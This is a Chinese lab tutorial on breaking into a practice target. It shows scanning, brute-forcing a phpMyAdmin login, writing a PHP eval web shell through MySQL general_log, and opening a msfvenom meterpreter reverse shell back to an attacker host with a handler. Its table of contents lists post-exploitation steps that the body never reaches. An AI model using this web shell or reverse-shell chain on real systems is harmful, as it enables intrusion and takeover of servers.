admin管理员组

文章数量:1637855

Web渗透测试对靶机注入shell

文章目录

  • Web渗透测试对靶机注入shell
    • 1、寻找目标信息
      • netdiscover扫描
      • nmap扫描
      • 利用御剑后台进行扫描
    • 2、对登录页面进行暴力破解
      • 启动burp suite对目标网页进行拦截
      • 对目标进行暴力破解
    • 3、进入phpmyadmin界面
      • 查看主页信息
      • 对目标信息进行渗透处理
        • 查看日志是否打开
        • 创建日志文件getshell
    • 4、用中国蚁剑进行连接
      • 建立连接
      • 用kali生成木马文件
        • 注意
      • 把生成的文件上传到服务器
      • 用kali进行监听
        • 用中国蚁剑运行程序
    • 5、后渗透阶段
      • 查看当前角色
      • 提权
      • 迁移进程
      • 获取账号密码
      • 加载 kiwi模块
        • 用法:
      • **远程桌面登录**
        • 用户添加失败
        • 去中国蚁剑进行添加
        • 用MobaXterm进行远程连接
      • **添加路由、挂Socks5代理**
      • 连接代理
        • 端口修改
        • 把meterpreter 放在后台运行
          • 返回meterpreter
      • 内网主机信息收集
      • 中国蚁剑终端使用命令
      • 内网存活主机服务探测(合集)
    • 6.内网横向渗透
      • 哈希传递攻击
      • 在meterpreter中运行
        • 运行命令
        • 中国蚁剑上运行
          • 执行第二台机器上的命令
    • 7.使用cobaltstike联动MSF
      • 安装cobaltstike
        • Cobaltstrike简介
      • 开启cobaltstike服务
        • kali上的操作
        • 物理机上操作
      • 开启监听
        • 添加监听
        • 查看添加
        • kali里面的操作
        • 返回cobaltstrike进行查看
      • 建立会话交互
      • 查看命令
      • 抓取密码
        • 得到密码
        • 查看密码
      • 横向移动:
        • 新建监听器
        • 横向移动目标机
          • 查看网络拓扑图
          • 横向移动第2个目标机
            • 查看网络拓扑图

1、寻找目标信息

netdiscover扫描

打开kali,使用root权限,输入命令

netdiscover

目标主机为显示 VMare的IP地址得到目标主机IP地址为:192.168.0.4

nmap扫描

输入命令

nmap -sV -O -T4 192.168.0.4

发现目标主机有端口3306是打开的

利用御剑后台进行扫描

输入域名(就是目标IP地址):192.168.0.4

得到网页地址:phpMyAdmin

网页界面如下

2、对登录页面进行暴力破解

启动burp suite对目标网页进行拦截

对目标进行暴力破解

  • 首先,单击【鼠标右键】–【发送给测试器】–点击【Intruder】
  • 进入intruder界面后,点击【Positions】
  • 然后点击【清除】把变量都清楚了
  • 选中【admin】(username和password)后面的值,单击【添加】,把要进行暴力破解的变量进行添加
  • 下拉攻击类型选中【Clusterbomb】


  • 然后点击【Payload】
  • 有效负载集为1载入Username.txt文件中的数据
  • 有效负载集为2载入Password.txt文件中的数据
  • 然后点击【开始攻击】:程序自动进行暴力破解
  • 匹配用户名和密码
    • 破解得到用户名为:root
    • 密码为:root

3、进入phpmyadmin界面

查看主页信息

对目标信息进行渗透处理

查看日志是否打开
  • 点击【变量】
    • 查看是否开启日志和日志地址

创建日志文件getshell
进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';	

下面图片是先前截的图

再次进入【变量】

把general log_file的路径中的文件名换成刚才新建的文件名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4、用中国蚁剑进行连接

建立连接

注意后缀名和密码

点击测试连接–连接成功–保存这个状态

用kali生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe
注意

LHOST的IP地址

和/home/kali/shell.exe的路径和文件名

建议把文件名改成自己想的名字

把生成的文件上传到服务器

用kali进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run

用中国蚁剑运行程序

去kali看看

入侵成功

5、后渗透阶段

查看当前角色

getuid

本文标签: 靶机测试webShellphpmyadmin